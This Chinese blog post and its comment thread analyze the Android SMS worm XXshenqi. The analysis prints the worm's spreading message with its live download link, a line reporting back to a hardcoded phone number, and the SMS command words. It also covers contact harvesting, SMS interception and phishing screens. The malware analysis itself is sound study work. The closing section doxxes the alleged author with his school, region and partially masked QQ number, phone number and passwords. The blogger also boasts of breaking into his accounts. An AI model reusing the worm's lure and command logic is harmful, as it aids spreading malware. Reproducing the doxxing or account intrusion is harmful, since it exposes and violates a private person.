Android短信蠕蟲XXshenqi分析
0x00
今天從余弦大大微博上看到了這款Android短信蠕蟲的信息,于是自己下載了一款研究,看到網上很多報告的md5值不同,不知道是否是變種。接下來就分析一下,這款病毒究竟做了些什么。
0x01
病毒分為兩個部分,一個是XXshenqi.apk,另一個是com.android.Trogoogle.apk。后者存在于前者解壓文件下的assets目錄中。首先,分析XXshenqi.apk,安裝至虛擬機上運行。
0. ?首先,在初始安裝后,用戶點擊app,會出現安裝另外一個apk的信息:
? ? ? ? ? ? ?? 
- 入口Activity是WelcomeActivity,在這個Activity中,首先獲取手機中所有的聯系人信息,然后群發一條短信,內容如下:
|
1 |
[聯系人姓名] + "看這個," +"http://cdn.yyupload.com/down/4279193/XXshenqi.apk" |
騙取本機聯系人點擊惡意鏈接下載病毒進行傳播。
發送成功后,執行:
|
1 |
SmsManager.getDefault().sendTextMessage("18670259904", null, "XXshenqi 群發鏈接OK", null, null); |
即向這個號碼反饋執行信息。
- 開啟一個MainActivity
在這個Activity中,安裝一個com.example.com.android.trogoogle的文件,這個文件存在于xxshenqi.apk解壓后文件的assets目錄下。
安裝木馬后,會自動隱藏圖標。
同時彈出一個登錄框,只不過這個是個幌子,怎么輸入都會出現密碼錯誤或者賬戶不存在,將用戶導入到一個注冊頁面:RegisterActivity中
3.RegisterActivity真的是注冊頁面嗎?
在這個頁面中,會讓用戶輸入很多信息,比如身份證號以及姓名。
如果點擊了注冊按鈕那么很不幸,你的信息就會發送到黑客的手機上。
至此,xxshenqi.apk的任務基本是完成了,即使用戶卸載也無所謂,因為木馬已經在剛開始就被釋放了。
0x02
1.在入口Activity—–MainActivity中木馬執行了隱藏圖標的功能,隨后打開了一個ListenMessageService的服務,在后臺運行。
2.ListenMessageService這個服務里面,首先注冊一個短信數據庫的觀察者,檢測短信數據庫的變化,一旦用戶的短信數據庫發生變化(收到信息或者更新信息),那么觀察者就會執行回調函數執行,首先判斷是否是命令短信,命令短信是用來向木馬發送命令的。如果是平常的短信,就將截獲的短信全部發往黑客手中,值得注意的是木馬還判斷短信是否是淘寶發送的短信,如果是的話就單獨處理。
并且木馬中還有發送偽造短信給用戶的功能,如果是這種短信,木馬就不會截獲或者發送給黑客。
這里還存在的惡意行為是讀取用戶收件發件箱短信,以及手機中的聯系人。
當截獲完短信之后,木馬就又開啟了一個MySendEmailService服務。
3.MySendEmailService這個服務就是給黑客發送電子郵件。
這上面都是一些用到的發送信息包括主機,端口,賬戶名,密碼(有密碼哦~)。。。
4.定義廣播接收者處理接收的命令BroadcastRecvMessage
BroadcastRecvMessage這個類繼承了系統的BroadcastReceiver組件,一旦接收到短信,就會觸發代碼,并判斷指令所要求木馬執行的具體功能。
readmessage 發送郵件命令
sendmessage發送短信命令
test測試命令
makemessage偽造短信命令
sendlink發送連接的命令
當然,這里也做了具體處理,就是判斷是否是普通短信和淘寶網購信息,如果是淘寶信息就加上一個Flag發送,簡直碉堡。
0x03
至此,這款病毒究竟做了些啥就基本清楚了,所做的操作也是一般短信木馬的常有功能,包括截獲短信并發送,發送惡意鏈接進行傳播(冒充聯系人發送,更有迷惑性),支持接收指令,以及發送惡意偽造的短信給用戶(冒充聯系人發送,更有迷惑性)等行為,還是比較歹毒的。
Android系統具有優美的開放性的同時,同樣也遭受著各種病毒的侵襲。面對這些病毒,最好的辦法還是不要去一些不正規的應用市場下載,并且注意安裝時認清權限,如果有可以的權限如:讀取系統日志,那么就不要輕易下載。
0x04
此篇分析是小編急著趕出來的,如果有錯誤的地方,還請指正,共同進步!
————————————以上內容來自91Ri團隊小編:隱形人,以下內容為此款蠕蟲作者簡要資料——————————
該蠕蟲作者為中南大學的一名李同學編寫,QQ號為:1377365** 在該蠕蟲爆發前QQ密碼為:lishuli** 目前身在湖南,電話號碼為181636573**
曾用密碼:entershi** shiftct**
在用密碼:略
在初中時曾就讀于深圳展華實驗學校,根據小編收集到的信息這名編寫蠕蟲的作者Android技術并不算強,但竟然能弄的包括小編身邊的一些小伙伴也中招,真是令人有點蛋疼。
小編雖然已經收集到了該作者詳細身份信息,住址,照片,并且進入了獲得了該名作者相關賬戶權限。但看在他還是一名90后,且能在今天這個七夕的的份上卻調皮搗蛋,跟小編一樣是一個…….(省略N個字),小編就不貼出更多信息。
本文重在對該蠕蟲的具體分析,文章并不是非常的詳細,不保證有錯誤,歡迎大家留言交流。祝有妹子的同學七夕快樂,沒妹子的同學擼站快樂~(話說有妹子的同學能看到你這篇文章嗎!!!)
【via@91ri.org團隊】
贊。我的手機要砸了。
這也太快了吧。。。。
哈哈,這個可是我們的小編同學冒著被妹子拍死的危險趕出來的文章。
大七夕的還玩這個,活該被妹子拍死
我得成果你們醬紫對他 真的好么 = =
贊。作者出現。
快;;
好low的感覺
是的 病毒本身技術不是很高超 比如很多歹毒的手段(如禁止卸載,動態加載),沒有用到。插一句,很多國外的研究報告不錯。
七夕干點啥不好非得分析病毒。。。
請教一下,文章中的代碼是怎么拿到的呢?
反編譯的話可讀性沒有這么好吧。。
是的 不過應該比匯編好讀哦~源碼google吧 今早下載的不知道連接還是否有效
就是反編譯得到的,從第二張代碼截圖第三行setContentView(一串數字)就可以看出來。源程序一般這么寫:setContentView(R.id.XXX)。而且從代碼截圖的樣式看顯然是jd-gui。估計是用的dex2jar將解壓后的classes.dex文件轉jar,然后用jd-gui查看的。PS:源程序打包apk的時候沒有加混淆,所以可讀性比較好。
拜托不要透露人家的基本情況好嗎?
圈子很小 做了什么都會有人關注跟進的
我學校的。。。唉,居然用自己手機
現在發現居然是一個直系學弟
居然發現一個足球隊的學弟在這里。
這圖片里手機,qq號都放出來了,下面再隱藏有幾個意思?
祖神來個2.0版本
經過17個小時的通宵奮戰,于8月2日18時抓獲制作傳播該病毒的犯罪嫌疑人李某。
萬一是陷害呢?誰會那么外行,把自己真實的信息嵌入代碼中傳播?
看來作者自己的安全意識也很爛,自己的密碼都寫在代碼中。還明文